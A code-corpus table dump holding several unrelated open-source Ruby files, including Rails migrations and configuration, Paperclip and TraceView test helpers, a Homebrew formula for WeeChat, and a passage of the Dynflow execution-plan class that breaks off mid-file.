hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e8b427f570eba599dadb0f959b5927b0fce0499c | 511 | class AddHomeTimeZoneToEventGroups < ActiveRecord::Migration[5.2]
def up
add_column :event_groups, :home_time_zone, :string
execute <<-SQL.squish
UPDATE event_groups
SET home_time_zone = (SELECT events.home_time_zone
FROM events
WHERE events.event_group_id = event_groups.id
LIMIT 1)
SQL
end
def down
remove_column :event_groups, :home_time_zone, :string
end
end
| 28.388889 | 79 | 0.585127 |
ed21023cd8a6c252ee913a0f9f2feaf03c3e7d35 | 4,438 | # Copyright (c) 2015 AppNeta, Inc.
# All rights reserved.
require 'rubygems'
require 'bundler/setup'
require "minitest/spec"
require "minitest/autorun"
require "minitest/reporters"
require "minitest/debugger" if ENV['DEBUG']
require "sinatra"
ENV["RACK_ENV"] = "test"
ENV["TRACEVIEW_GEM_TEST"] = "true"
ENV["TRACEVIEW_GEM_VERBOSE"] = "true"
# FIXME: Temp hack to fix padrino-core calling RUBY_ENGINE when it's
# not defined under Ruby 1.8.7 and 1.9.3
RUBY_ENGINE = "ruby" unless defined?(RUBY_ENGINE)
Minitest::Spec.new 'pry'
unless RUBY_VERSION =~ /^1.8/
MiniTest::Reporters.use! MiniTest::Reporters::SpecReporter.new
end
if defined?(JRUBY_VERSION)
ENV['JAVA_OPTS'] = "-J-javaagent:/usr/local/tracelytics/tracelyticsagent.jar"
end
@trace_dir = "/tmp/"
$trace_file = @trace_dir + "trace_output.bson"
Bundler.require(:default, :test)
# Configure TraceView
TraceView::Config[:verbose] = true
TraceView::Config[:tracing_mode] = "always"
TraceView::Config[:sample_rate] = 1000000
TraceView.logger.level = Logger::DEBUG
# Pre-create test databases (see also .travis.yml)
# puts "Pre-creating test databases"
# puts %x{mysql -u root -e 'create database travis_ci_test;'}
# puts %x{psql -c 'create database travis_ci_test;' -U postgres}
# Our background Rack-app for http client testing
require "./test/servers/rackapp_8101"
# Conditionally load other background servers
# depending on what we're testing
#
case File.basename(ENV['BUNDLE_GEMFILE'])
when /rails4/
require "./test/servers/rails4x_8140"
when /rails3/
require "./test/servers/rails3x_8140"
when /frameworks/
when /libraries/
end
##
# clear_all_traces
#
# Truncates the trace output file to zero
#
def clear_all_traces
if TraceView.loaded
TraceView::Reporter.clear_all_traces
end
end
##
# get_all_traces
#
# Retrieves all traces written to the trace file
#
def get_all_traces
if TraceView.loaded
TraceView::Reporter.get_all_traces
else
[]
end
end
##
# validate_outer_layers
#
# Validates that the KVs in kvs are present
# in event
#
def validate_outer_layers(traces, layer)
traces.first['Layer'].must_equal layer
traces.first['Label'].must_equal 'entry'
traces.last['Layer'].must_equal layer
traces.last['Label'].must_equal 'exit'
end
##
# validate_event_keys
#
# Validates that the KVs in kvs are present
# in event
#
def validate_event_keys(event, kvs)
kvs.each do |k, v|
event.has_key?(k).must_equal true
event[k].must_equal v
end
end
##
# has_edge?
#
# Searches the array of <tt>traces</tt> for
# <tt>edge</tt>
#
def has_edge?(edge, traces)
traces.each do |t|
if TraceView::XTrace.edge_id(t["X-Trace"]) == edge
return true
end
end
TraceView.logger.debug "[oboe/debug] edge #{edge} not found in traces."
false
end
##
# valid_edges?
#
# Runs through the array of <tt>traces</tt> to validate
# that all edges connect.
#
# Not that this won't work for external cross-app tracing
# since we won't have those remote traces to validate
# against.
#
def valid_edges?(traces)
traces.reverse.each do |t|
if t.key?("Edge")
return false unless has_edge?(t["Edge"], traces)
end
end
true
end
##
# layer_has_key
#
# Checks an array of trace events if a specific layer (regardless of event type)
# has he specified key
#
def layer_has_key(traces, layer, key)
return false if traces.empty?
has_key = false
traces.each do |t|
if t["Layer"] == layer and t.has_key?(key)
has_key = true
(t["Backtrace"].length > 0).must_equal true
end
end
has_key.must_equal true
end
##
# layer_doesnt_have_key
#
# Checks an array of trace events to assure that a specific layer
# (regardless of event type) doesn't have the specified key
#
def layer_doesnt_have_key(traces, layer, key)
return false if traces.empty?
has_key = false
traces.each do |t|
has_key = true if t["Layer"] == layer and t.has_key?(key)
end
has_key.must_equal false
end
##
# Sinatra and Padrino Related Helpers
#
# Taken from padrino-core gem
#
class Sinatra::Base
# Allow assertions in request context
include MiniTest::Assertions
end
class MiniTest::Spec
include Rack::Test::Methods
# Sets up a Sinatra::Base subclass defined with the block
# given. Used in setup or individual spec methods to establish
# the application.
def mock_app(base=Padrino::Application, &block)
@app = Sinatra.new(base, &block)
end
def app
Rack::Lint.new(@app)
end
end
| 21.033175 | 80 | 0.719243 |
1104cda77ffc1281e4943374082f88ca24d11e22 | 5,638 | module BaseDelayedPaperclipTest
def setup
super
DelayedPaperclip.options[:url_with_processing] = true
reset_dummy
end
def test_normal_paperclip_functioning
reset_dummy :with_processed => false
Paperclip::Attachment.any_instance.expects(:post_process)
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
assert !dummy.image.delay_processing?
assert dummy.image.post_processing
assert dummy.save
assert File.exist?(dummy.image.path)
end
def test_normal_explisit_post_processing_with_delayed_paperclip
reset_dummy :with_processed => true
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
dummy.image.post_processing = true
assert !dummy.image.delay_processing?
assert dummy.image.post_processing, "Post processing should return true"
assert dummy.save
assert File.exist?(dummy.image.path)
end
def test_delayed_paperclip_functioning
build_dummy_table(false)
reset_class "Dummy", :with_processed => true
Paperclip::Attachment.any_instance.expects(:post_process).never
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
assert dummy.image.delay_processing?
assert !dummy.image.post_processing
assert dummy.save
assert File.exist?(dummy.image.path), "Path #{dummy.image.path} should exist"
end
def test_enqueue_job_if_source_changed
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
dummy.image = File.open("#{RAILS_ROOT}/test/fixtures/12k.png")
original_job_count = jobs_count
dummy.save
assert_equal original_job_count + 1, jobs_count
end
def test_processing_column_kept_intact
Paperclip::Attachment.any_instance.stubs(:reprocess!).raises(StandardError.new('oops'))
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert dummy.image_processing?
process_jobs rescue nil # some adapters raise, some don't
assert dummy.image_processing?
assert dummy.reload.image_processing?
end
def test_processing_true_when_new_image_added
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
assert !dummy.image_processing?
assert dummy.new_record?
dummy.save!
assert dummy.reload.image_processing?
end
def test_processed_true_when_delayed_jobs_completed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
dummy.reload
assert !dummy.image_processing?, "Image should no longer be processing"
end
def test_unprocessed_image_returns_missing_url
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_equal "/images/original/missing.png", dummy.image.url(:original, :timestamp => false)
process_jobs
dummy.reload
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_unprocessed_image_not_returning_missing_url_if_turrned_of_globally
DelayedPaperclip.options[:url_with_processing] = false
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match %r{/system/images/1/original/12k.png}, dummy.image.url
process_jobs
dummy.reload
assert_match %r{/system/images/1/original/12k.png}, dummy.image.url
end
def test_unprocessed_image_not_returning_missing_url_if_turrned_of_on_instance
reset_dummy :with_processed => false, :url_with_processing => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
process_jobs
dummy.reload
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_original_url_when_no_processing_column
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_original_url_if_image_changed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
dummy.image = File.open("#{RAILS_ROOT}/test/fixtures/12k.png")
dummy.save!
assert_equal '/images/original/missing.png', dummy.image.url(:original, :timestamp => false)
process_jobs
assert_match(%r{system/images/.*original.*}, dummy.reload.image.url)
end
def test_missing_url_if_image_hasnt_changed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{images/.*missing.*}, dummy.image.url)
end
def test_should_not_blow_up_if_dsl_unused
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
assert dummy.image.url
end
def test_after_callback_is_functional
Dummy.send(:define_method, :done_processing) { puts 'done' }
Dummy.after_image_post_process :done_processing
Dummy.any_instance.expects(:done_processing)
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
end
def test_delayed_paperclip_functioning_with_after_update_callback
reset_class "Dummy", :with_processed => true, :with_after_update_callback => true
Dummy.any_instance.expects(:reprocess)
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
dummy.update!(name: "hi")
end
end
| 37.337748 | 96 | 0.734126 |
39ef817d5d278cb4afcd6704e689dcf987dedf3e | 974 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'll/wk/api/version'
Gem::Specification.new do |spec|
spec.name = 'll_wk_api'
spec.version = LL::WK::API::VERSION
spec.authors = ['Matt Mofrad']
spec.email = ['[email protected]']
spec.summary = 'Gem for interacting with livelink webkiosks'
spec.homepage = 'https://github.com/Zibby/wk_api_gem'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.16'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_dependency 'curb'
spec.add_dependency 'httparty'
end
| 34.785714 | 74 | 0.645791 |
28ed07e79990fbfeb14508e724d1e30599a0b99f | 169 | module Quickbooks
module Model
class NameValue < BaseModel
xml_accessor :name, :from => "Name"
xml_accessor :value, :from => "Value"
end
end
end
| 18.777778 | 43 | 0.64497 |
33fb5b2240e0e98ef579538d64696876d7bdde0a | 3,704 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable Rails's static asset server (Apache or nginx will already do this).
config.serve_static_assets = false
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Compress JavaScripts and CSS.
# Required for angular $scope variable and others. Refactor if you want to improve compression performance
config.assets.js_compressor = Sprockets::LazyCompressor.new { Uglifier.new(:mangle => false) }
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Generate digests for assets URLs.
config.assets.digest = true
# `config.assets.precompile` has moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Set to :debug to see everything in the log.
config.log_level = :info
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# config.assets.precompile += %w( search.js )
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Disable automatic flushing of the log to improve performance.
# config.autoflush_log = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
#Enable subdomains two deep as in app.clicker.dev
config.action_dispatch.tld_length = 2
end
| 41.617978 | 108 | 0.734071 |
18f85165d39b773371664ed14cdd35716a231c5a | 243 | class CreateArtists < ActiveRecord::Migration
def change
create_table :artists do |t|
t.string :name
t.integer :spotify_id
t.integer :spotify_popularity
t.string :spotify_url
t.timestamps
end
end
end
| 18.692308 | 45 | 0.670782 |
ed6ad8fe77e4d8a11e274be9e4f6cbdece08905a | 1,777 | require 'uri'
module Yoda
class Server
# Denotes workspace folder in LSP.
# @see: https://microsoft.github.io/language-server-protocol/specifications/specification-current/#workspace_workspaceFolders
class Workspace
# @return [FileStore]
attr_reader :file_store
# @return [String]
attr_reader :name
# @return [String]
attr_reader :root_uri
# @param folder [LanguageServer::Protocol::Interface::WorkspaceFolder]
# @return [Workspace]
def self.from_workspace_folder(folder)
new(name: folder.name, root_uri: folder.uri)
end
# @param name [String]
# @param root_uri [String]
def initialize(name:, root_uri:)
@name = name
@root_uri = root_uri
@file_store = FileStore.new
end
# @return [Array<Exception>] errors on setup
def setup
project.setup
end
# @return [Store::Project, nil]
def project
@project ||= Store::Project.new(name: name, root_path: root_path)
end
def root_path
FileStore.path_of_uri(root_uri)
end
# @param path [String]
def uri_of_path(path)
FileStore.uri_of_path(File.expand_path(path, root_path))
end
def read_source(uri)
path = FileStore.path_of_uri(uri)
return unless subpath?(path)
file_store.load(uri)
project.read_source(path)
end
# @param uri [String]
# @param source [String]
def store_source(uri:, source:)
file_store.store(uri, source)
end
def suburi?(uri)
path = FileStore.path_of_uri(uri)
subpath?(path)
end
def subpath?(path)
File.fnmatch("#{root_path}/**/*", path)
end
end
end
end
| 24.013514 | 129 | 0.609454 |
bb021148faa37a25867bf606dd9ee37e39f0aaf0 | 264 | module OpenActive
module Models
module Schema
class MedicalProcedureType < ::OpenActive::JsonLdModel
# @!attribute type
# @return [String]
def type
"schema:MedicalProcedureType"
end
end
end
end
end
| 18.857143 | 60 | 0.602273 |
267cc33955dcf513facdbd3271aec48b350e60c6 | 239 | class CreateTasks < ActiveRecord::Migration[6.0]
def change
create_table :tasks do |t|
t.datetime :due_date
t.string :description
t.integer :user_id
t.integer :project_id
t.timestamps
end
end
end
| 18.384615 | 48 | 0.65272 |
e2dc000f88e1cecad4109d46c5497ef857d6538c | 285 | FactoryBot.define do
# Define your Spree extensions Factories within this file to enable applications, and other extensions to use and override them.
#
# Example adding this to your spec_helper will load these Factories for use:
# require 'spree_refer_by_qrcode/factories'
end
| 40.714286 | 130 | 0.792982 |
bf23ebcee81b6a61f13dea149e5bfe86b6bd18bf | 66 | class Command < ActiveRecord::Base
belongs_to :device_group
end
| 16.5 | 34 | 0.80303 |
1cb0dfaedc39426c1be25f20a86994399ac5934d | 1,412 | class Weechat < Formula
desc "Extensible IRC client"
homepage "https://www.weechat.org"
url "https://weechat.org/files/src/weechat-2.7.tar.xz"
sha256 "56fc42a4afece57bc27f95a2d155815a5e6472f32535add4c0ab4ce3b5e399e7"
head "https://github.com/weechat/weechat.git"
bottle do
sha256 "6b1633f4e5f572c6358094ce4d14f40accb43cf4b827bff90cd919724eb1435c" => :catalina
sha256 "d7ff08c8ed104c89b7463d1cbf6740fd15def9991355855bbe20fd51838b9332" => :mojave
sha256 "69b7afc70b76386a35e6a63978a8c44f515fdabd19b1b1a3027162ede7a24a99" => :high_sierra
end
depends_on "asciidoctor" => :build
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "aspell"
depends_on "gettext"
depends_on "gnutls"
depends_on "libgcrypt"
depends_on "libiconv"
depends_on "lua"
depends_on "ncurses"
depends_on "perl"
depends_on "python"
depends_on "ruby"
def install
args = std_cmake_args + %W[
-DENABLE_MAN=ON
-DENABLE_GUILE=OFF
-DCA_FILE=#{etc}/openssl/cert.pem
-DENABLE_JAVASCRIPT=OFF
-DENABLE_PHP=OFF
]
if MacOS.version >= :mojave && MacOS::CLT.installed?
ENV["SDKROOT"] = ENV["HOMEBREW_SDKROOT"] = MacOS::CLT.sdk_path(MacOS.version)
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install", "VERBOSE=1"
end
end
test do
system "#{bin}/weechat", "-r", "/quit"
end
end
| 27.686275 | 93 | 0.704674 |
79dec442818be6f4be60d91f36ee52aa7f03de27 | 495 | require 'spec_helper'
feature 'Projects > Members > Member leaves project', feature: true do
let(:user) { create(:user) }
let(:project) { create(:project) }
background do
project.team << [user, :developer]
login_as(user)
visit namespace_project_path(project.namespace, project)
end
scenario 'user leaves project' do
click_link 'Leave Project'
expect(current_path).to eq(dashboard_projects_path)
expect(project.users.exists?(user.id)).to be_falsey
end
end
| 24.75 | 70 | 0.715152 |
7932b78441ee2b927902bf5697f0d54589226955 | 490 | class Micropost < ApplicationRecord
belongs_to :user
default_scope -> { order(created_at: :desc) }
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content, presence: true,
length: { maximum: 140 }
validate :picture_size
private
# Validates the size of an uploaded picture.
def picture_size
if picture.size > 5.megabytes
errors.add(:picture, "should be less than 5MB")
end
end
end
| 25.789474 | 55 | 0.671429 |
ede01fafcaf9273e4cc5a156b82a3ec235e9416d | 4,310 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "sample_app_#{Rails.env}"
config.action_mailer.perform_caching = false
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :smtp
host = 'morning-beach-58479.herokuapp.com'
config.action_mailer.default_url_options = { host: host }
ActionMailer::Base.smtp_settings = {
:address => 'smtp.sendgrid.net',
:port => '587',
:authentication => :plain,
:user_name => ENV['SENDGRID_USERNAME'],
:password => ENV['SENDGRID_PASSWORD'],
:domain => 'heroku.com',
:enable_starttls_auto => true
}
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 40.660377 | 102 | 0.742923 |
28a5c878d4d38a7454cd5063f08e17cca4762989 | 18,101 | require 'securerandom'
module Dynflow
# rubocop:disable Metrics/ClassLength
# TODO extract planning logic to an extra class ExecutionPlanner
class ExecutionPlan < Serializable
# a fallback object representing a plan with some corrupted data,
# preventing to load the whole plan properly, this can be used for presenting
# at least some data and not running into internal server errors
class InvalidPlan
attr_reader :exception, :id, :label, :state,
:started_at, :ended_at,
:execution_time, :real_time, :execution_history
def initialize(exception, id, label, state,
started_at = nil, ended_at = nil,
execution_time = nil, real_time = nil, execution_history = nil)
@exception = exception
@id = id
@label = label || 'N/A'
@state = state
@started_at = started_at
@ended_at = ended_at
@execution_time = execution_time
@real_time = real_time
@execution_history = execution_history || []
end
def valid?
false
end
def result
'N/A'
end
end
include Algebrick::TypeCheck
include Stateful
require 'dynflow/execution_plan/steps'
require 'dynflow/execution_plan/output_reference'
require 'dynflow/execution_plan/dependency_graph'
attr_reader :id, :world, :label,
:root_plan_step, :steps, :run_flow, :finalize_flow,
:started_at, :ended_at, :execution_time, :real_time, :execution_history
def self.states
@states ||= [:pending, :scheduled, :planning, :planned, :running, :paused, :stopped]
end
require 'dynflow/execution_plan/hooks'
def self.results
@results ||= [:pending, :success, :warning, :error, :cancelled]
end
def self.state_transitions
@state_transitions ||= { pending: [:stopped, :scheduled, :planning],
scheduled: [:planning, :stopped],
planning: [:planned, :stopped],
planned: [:running, :stopped],
running: [:paused, :stopped],
paused: [:running, :stopped],
stopped: [] }
end
# all params with default values are part of *private* api
def initialize(world,
id = SecureRandom.uuid,
label = nil,
state = :pending,
root_plan_step = nil,
run_flow = Flows::Concurrence.new([]),
finalize_flow = Flows::Sequence.new([]),
steps = {},
started_at = nil,
ended_at = nil,
execution_time = nil,
real_time = 0.0,
execution_history = ExecutionHistory.new)
@id = Type! id, String
@world = Type! world, World
@label = Type! label, String, NilClass
self.state = state
@run_flow = Type! run_flow, Flows::Abstract
@finalize_flow = Type! finalize_flow, Flows::Abstract
@root_plan_step = root_plan_step
@started_at = Type! started_at, Time, NilClass
@ended_at = Type! ended_at, Time, NilClass
@execution_time = Type! execution_time, Numeric, NilClass
@real_time = Type! real_time, Numeric
@execution_history = Type! execution_history, ExecutionHistory
steps.all? do |k, v|
Type! k, Integer
Type! v, Steps::Abstract
end
@steps = steps
end
def valid?
true
end
def logger
@world.logger
end
def update_state(state)
hooks_to_run = [state]
original = self.state
case self.state = state
when :planning
@started_at = Time.now
when :stopped
@ended_at = Time.now
@real_time = @ended_at - @started_at unless @started_at.nil?
@execution_time = compute_execution_time
hooks_to_run << (failure? ? :failure : :success)
unlock_all_singleton_locks!
when :paused
unlock_all_singleton_locks!
else
# ignore
end
logger.debug format('%13s %s %9s >> %9s',
'ExecutionPlan', id, original, state)
self.save
hooks_to_run.each { |kind| run_hooks kind }
end
def run_hooks(state)
records = persistence.load_actions_attributes(@id, [:id, :class]).select do |action|
Utils.constantize(action[:class])
.execution_plan_hooks
.on(state).any?
end
action_ids = records.compact.map { |record| record[:id] }
return if action_ids.empty?
persistence.load_actions(self, action_ids).each do |action|
world.middleware.execute(:hook, action, self) do
action.class.execution_plan_hooks.run(self, action, state)
end
end
end
def result
all_steps = steps.values
if all_steps.any? { |step| step.state == :cancelled }
return :cancelled
elsif all_steps.any? { |step| step.state == :error }
return :error
elsif all_steps.any? { |step| [:skipping, :skipped].include?(step.state) }
return :warning
elsif all_steps.all? { |step| step.state == :success }
return :success
else
return :pending
end
end
def error?
result == :error
end
def failure?
[:error, :warning, :cancelled].include?(result)
end
def error_in_plan?
steps_in_state(:error).any? { |step| step.is_a? Steps::PlanStep }
end
def errors
steps.values.map(&:error).compact
end
def rescue_strategy
rescue_strategy = entry_action.rescue_strategy || Action::Rescue::Skip
Type! rescue_strategy, Action::Rescue::Strategy
end
def sub_plans
persistence.find_execution_plans(filters: { 'caller_execution_plan_id' => self.id })
end
def sub_plans_count
persistence.find_execution_plan_counts(filters: { 'caller_execution_plan_id' => self.id })
end
def rescue_plan_id
case rescue_strategy
when Action::Rescue::Pause
nil
when Action::Rescue::Fail
update_state :stopped
nil
when Action::Rescue::Skip
failed_steps.each { |step| self.skip(step) }
self.id
end
end
def plan_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::PlanStep)
end
def run_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::RunStep)
end
def finalize_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::FinalizeStep)
end
def failed_steps
steps_in_state(:error)
end
def steps_in_state(*states)
self.steps.values.find_all {|step| states.include?(step.state) }
end
def rescue_from_error
if rescue_plan_id = self.rescue_plan_id
@world.execute(rescue_plan_id)
else
raise Errors::RescueError, 'Unable to rescue from the error'
end
end
def generate_action_id
@last_action_id ||= 0
@last_action_id += 1
end
def generate_step_id
@last_step_id ||= 0
@last_step_id += 1
end
def delay(caller_action, action_class, delay_options, *args)
save
@root_plan_step = add_scheduling_step(action_class, caller_action)
execution_history.add("delay", @world.id)
serializer = root_plan_step.delay(delay_options, args)
delayed_plan = DelayedPlan.new(@world,
id,
delay_options[:start_at],
delay_options.fetch(:start_before, nil),
serializer,
delay_options[:frozen] || false)
persistence.save_delayed_plan(delayed_plan)
ensure
update_state(error? ? :stopped : :scheduled)
end
def delay_record
@delay_record ||= persistence.load_delayed_plan(id)
end
def prepare(action_class, options = {})
options = options.dup
caller_action = Type! options.delete(:caller_action), Dynflow::Action, NilClass
raise "Unexpected options #{options.keys.inspect}" unless options.empty?
save
@root_plan_step = add_plan_step(action_class, caller_action)
@root_plan_step.save
end
def plan(*args)
update_state(:planning)
world.middleware.execute(:plan_phase, root_plan_step.action_class, self) do
with_planning_scope do
root_action = root_plan_step.execute(self, nil, false, *args)
@label = root_action.label
if @dependency_graph.unresolved?
raise "Some dependencies were not resolved: #{@dependency_graph.inspect}"
end
end
end
if @run_flow.size == 1
@run_flow = @run_flow.sub_flows.first
end
steps.values.each(&:save)
update_state(error? ? :stopped : :planned)
end
# sends the cancel event to all currently running and cancellable steps.
# if the plan is just scheduled, it cancels it (and returns an one-item
# array with the future value of the cancel result)
def cancel(force = false)
if state == :scheduled
[Concurrent.future.tap { |f| f.success delay_record.cancel }]
else
event = force ? ::Dynflow::Action::Cancellable::Abort : ::Dynflow::Action::Cancellable::Cancel
steps_to_cancel.map do |step|
world.event(id, step.id, event)
end
end
end
def cancellable?
return true if state == :scheduled
return false unless state == :running
steps_to_cancel.any?
end
def steps_to_cancel
steps_in_state(:running, :suspended).find_all do |step|
step.action(self).is_a?(::Dynflow::Action::Cancellable)
end
end
def skip(step)
steps_to_skip = steps_to_skip(step).each(&:mark_to_skip)
self.save
return steps_to_skip
end
# All the steps that need to get skipped when wanting to skip the step
# includes the step itself, all steps dependent on it (even transitively)
# FIND maybe move to persistence to let adapter to do it effectively?
# @return [Array<Steps::Abstract>]
def steps_to_skip(step)
dependent_steps = steps.values.find_all do |s|
next if s.is_a? Steps::PlanStep
action = persistence.load_action(s)
action.required_step_ids.include?(step.id)
end
steps_to_skip = dependent_steps.map do |dependent_step|
steps_to_skip(dependent_step)
end.flatten
steps_to_skip << step
if step.is_a? Steps::RunStep
finalize_step_id = persistence.load_action(step).finalize_step_id
steps_to_skip << steps[finalize_step_id] if finalize_step_id
end
return steps_to_skip.uniq
end
# @api private
def steps_of_type(type)
steps.values.find_all { |step| step.is_a?(type) }
end
def current_run_flow
@run_flow_stack.last
end
# @api private
def with_planning_scope(&block)
@run_flow_stack = []
@dependency_graph = DependencyGraph.new
switch_flow(run_flow, &block)
ensure
@run_flow_stack = nil
@dependency_graph = nil
end
# @api private
# Switches the flow type (Sequence, Concurrence) to be used within the block.
def switch_flow(new_flow, &block)
@run_flow_stack << new_flow
return block.call
ensure
@run_flow_stack.pop
current_run_flow.add_and_resolve(@dependency_graph, new_flow) if current_run_flow
end
def add_scheduling_step(action_class, caller_action = nil)
add_step(Steps::PlanStep, action_class, generate_action_id, :scheduling).tap do |step|
step.initialize_action(caller_action)
end
end
